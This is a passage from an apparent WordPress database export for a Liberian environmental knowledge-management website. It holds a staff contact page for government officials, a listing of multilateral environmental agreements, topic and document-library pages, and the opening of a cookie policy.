loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />														\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/nadine-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/nadine-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/henry.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/henry.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/henry-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/henry-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine A\'jami</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','publish','closed','closed','','contact-us','','','2022-09-20 11:02:14','2022-09-20 11:02:14','',0,'https://ekmsliberia.info/?page_id=80',0,'page','',0),(81,1,'2019-11-08 06:44:22','2019-11-08 06:44:22','','Contact','','inherit','closed','closed','','80-revision-v1','','','2019-11-08 06:44:22','2019-11-08 06:44:22','',80,'https://ekmsliberia.info/2019/11/08/80-revision-v1/',0,'revision','',0),(82,1,'2019-11-08 06:45:52','2019-11-08 06:45:52','','News and Blogs','','publish','closed','closed','','news-and-blogs','','','2019-11-27 10:17:32','2019-11-27 10:17:32','',0,'https://ekmsliberia.info/?page_id=82',0,'page','',0),(83,1,'2019-11-08 06:45:52','2019-11-08 06:45:52','','Blogs, News and Stories','','inherit','closed','closed','','82-revision-v1','','','2019-11-08 06:45:52','2019-11-08 06:45:52','',82,'https://ekmsliberia.info/2019/11/08/82-revision-v1/',0,'revision','',0),(84,1,'2019-11-08 06:47:38','2019-11-08 06:47:38','<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya.png\" alt=\"Nagoya Protocol on Access and Benefits Sharing\" loading=\"lazy\" width=\"370\" height=\"186\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\">Nagoya Protocol on Access and Benefits Sharing</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/esamuels/\"  rel=\"author\">Elvina Samuels</a><a href=\"https://ekmsliberia.info/2021/04/16/\"  ><time datetime=\"2021-04-16T09:51:23+00:00\" title=\"2021-04-16T09:51:23+00:00\">April 16, 2021</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/#respond\" ></a>The Nagoya Protocol on Access and Benefit sharing was adopted by the Conference of the Parties to the Convention on&hellip;<a href=\"https://ekmsliberia.info/mea-resource/nagoya-protocol-on-access-and-benefits-sharing/\">Read More</a>\n	<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena.png\" alt=\"Cartagena Protocol on Biosafety to the Convention on Biological Diversity\" loading=\"lazy\" width=\"370\" height=\"186\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\">Cartagena Protocol on Biosafety to the Convention on Biological Diversity</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/esamuels/\"  rel=\"author\">Elvina Samuels</a><a href=\"https://ekmsliberia.info/2021/04/16/\"  ><time datetime=\"2021-04-16T09:40:23+00:00\" title=\"2021-04-16T09:40:23+00:00\">April 16, 2021</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/#respond\" ></a>The Cartagena Protocol on Biosafety to the Convention on Biological Diversity was adopted by the Conference of the Parties to&hellip;<a href=\"https://ekmsliberia.info/mea-resource/cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity/\">Read More</a>\n	<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Untitled.png\" alt=\"Stockholm Convention on Persistent Organic Pollutants\" loading=\"lazy\" width=\"370\" height=\"186\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\">Stockholm Convention on Persistent Organic Pollutants</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/esamuels/\"  rel=\"author\">Elvina Samuels</a><a href=\"https://ekmsliberia.info/2021/04/12/\"  ><time datetime=\"2021-04-12T13:43:31+00:00\" title=\"2021-04-12T13:43:31+00:00\">April 12, 2021</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/#respond\" ></a>The Stockholm Convention is multilateral environmental agreement to protect human health and the environment from chemicals known as POPs. Liberia&hellip;<a href=\"https://ekmsliberia.info/mea-resource/stockholm-convention/\">Read More</a>\n	<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg\" alt=\"United Nations Framework Convention on Climate Change\" loading=\"lazy\" width=\"370\" height=\"186\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/admin_2/\"  rel=\"author\">Administrator</a><a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:44:46+00:00\" title=\"2019-11-12T01:44:46+00:00\">November 12, 2019</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/#respond\" ></a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it has near-universal&hellip;<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n	<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-e1618235603738.jpg\" alt=\"United Nations Convention to Combat Desertification\" loading=\"lazy\" width=\"370\" height=\"205\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/admin_2/\"  rel=\"author\">Administrator</a><a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:40:44+00:00\" title=\"2019-11-12T01:40:44+00:00\">November 12, 2019</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/#respond\" ></a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment&hellip;<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n	<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" loading=\"lazy\" width=\"370\" height=\"205\"></a><h4><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a></h4>Posted by <a href=\"https://ekmsliberia.info/author/admin_2/\"  rel=\"author\">Administrator</a><a href=\"https://ekmsliberia.info/2019/11/12/\"  ><time datetime=\"2019-11-12T01:37:16+00:00\" title=\"2019-11-12T01:37:16+00:00\">November 12, 2019</time></a>Comments: <a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/#respond\" ></a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the Convention on&hellip;<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','publish','closed','closed','','multilateral-environmental-agreements','','','2022-08-19 14:54:42','2022-08-19 14:54:42','',0,'https://ekmsliberia.info/?page_id=84',0,'page','',0),(85,1,'2019-11-08 06:47:38','2019-11-08 06:47:38','','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-08 06:47:38','2019-11-08 06:47:38','',84,'https://ekmsliberia.info/2019/11/08/84-revision-v1/',0,'revision','',0),(87,1,'2019-11-08 06:48:50','2019-11-08 06:48:50','<h2>Select a Topic</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/mitigation/\">Mitigation</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\">Local Communities and Indigenous People</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-use/\">Land Use</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/gender/\">Gender</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/education-and-youth/\">Education and Youth</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-technology/\">Climate Technology</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/climate-finance/\">Climate Finance</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/capacity-building/\">Capacity Building</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/adaptation-and-resilience/\">Adaptation and Resilience</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/action-on-climate-and-sustainable-development-goals/\">Action on Climate and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-human-security/\">Land and Human Security</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-drought/\">Land Degradation and Drought</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/desertification/\">Desertification</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-sustainable-development-goals/\">Land and Sustainable Development Goals</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/climate-change/\">Climate Change</a><h4><a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\">Land and Climate</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\">Forest Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/dry-and-sub-humid-land-biodiversity/\">Dry and Sub-humid land Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/agricultural-biodiversity/\">Agricultural Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\">Inland Waters Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/island-biodiversity/\">Island Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\">Marine and Coastal Biodiversity</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/biodiversity/\">Biodiversity</a><h4><a href=\"https://ekmsliberia.info/related-topic/mountain-biodiversity/\">Mountain Biodiversity</a></h4>','Related Topics','','publish','closed','closed','','related-topics','','','2019-11-26 00:59:07','2019-11-26 00:59:07','',0,'https://ekmsliberia.info/?page_id=87',0,'page','',0),(88,1,'2019-11-08 06:48:50','2019-11-08 06:48:50','','Conventions Topics','','inherit','closed','closed','','87-revision-v1','','','2019-11-08 06:48:50','2019-11-08 06:48:50','',87,'https://ekmsliberia.info/2019/11/08/87-revision-v1/',0,'revision','',0),(89,1,'2019-11-08 06:49:34','2019-11-08 06:49:34','<h2>Institutions - Government, National and International</h2>','Institutions Resources','','publish','closed','closed','','institutions-resources','','','2021-08-17 15:07:15','2021-08-17 15:07:15','',0,'https://ekmsliberia.info/?page_id=89',0,'page','',0),(90,1,'2019-11-08 06:49:34','2019-11-08 06:49:34','','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-08 06:49:34','2019-11-08 06:49:34','',89,'https://ekmsliberia.info/2019/11/08/89-revision-v1/',0,'revision','',0),(91,1,'2019-11-08 06:51:18','2019-11-08 06:51:18','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','publish','closed','closed','','document-library','','','2021-08-19 14:07:15','2021-08-19 14:07:15','',0,'https://ekmsliberia.info/?page_id=91',0,'page','',0),(92,1,'2019-11-08 06:51:18','2019-11-08 06:51:18','','Documents and Other Resources','','inherit','closed','closed','','91-revision-v1','','','2019-11-08 06:51:18','2019-11-08 06:51:18','',91,'https://ekmsliberia.info/2019/11/08/91-revision-v1/',0,'revision','',0),(102,1,'2019-11-08 07:02:46','2019-11-08 07:02:46','<h1>Cookie Policy for Environmental Knowledge Management System</h1>		\n		<p>This is the Cookie Policy for Environmental Knowledge Management System, accessible from <a style=\"font-size: 15px; background-color: #ffffff;\" href=\"https://ekmsliberia.info\">https://ekmsliberia.info</a></p><h2><strong>What Are Cookies</strong></h2><p>As is common practice with almost all professional websites this site uses cookies, which are tiny files that are downloaded to your computer, to improve your experience. This page describes what information they gather, how we use it and why we sometimes need to store these cookies. We will also share how you can prevent these cookies from being stored however this may downgrade or \'break\' certain elements of the sites functionality.</p><p>For more general information on cookies see the Wikipedia article on HTTP Cookies.</p><h2><strong>How We Use Cookies</strong></h2><p>We use cookies for a variety of reasons detailed below. Unfortunately in most cases there are no industry standard options for disabling cookies without completely disabling the functionality and features they add to this site. It is recommended that you leave on all cookies if you are not sure whether you need them or not in case they are used to provide a service that you use.</p><h2><strong>Disabling Cookies</strong></h2><p>You can prevent the setting of cookies by adjusting the settings on your browser (see your browser Help for how to do this). Be aware that disabling cookies will affect the functionality of this and many other websites that you visit. Disabling cookies will usually result in also disabling certain functionality and features of the this site. Therefore it is recommended that you do not disable cookies.</p><h2><strong>The Cookies We Set</strong></h2><ul><li><p>Account related cookies</p><p>If you create an account with us then we will use cookies for the management of the signup process and general administration. These cookies will usually be deleted when you log out however in some cases they may remain afterwards to remember your site preferences when logged out.</p></li><li><p>Login related cookies</p><p>We use cookies when you are logged in so that we can remember this fact. This prevents you from having to log in every single time you visit a new page. These cookies are typically removed or cleared when you log out to ensure that you can only access restricted features and areas when logged in.</p></li><li><p>Email newsletters related cookies</p><p>This site offers newsletter or email subscription services and cookies may be used to remember if you are already registered and whether to show certain notifications which might only be valid to 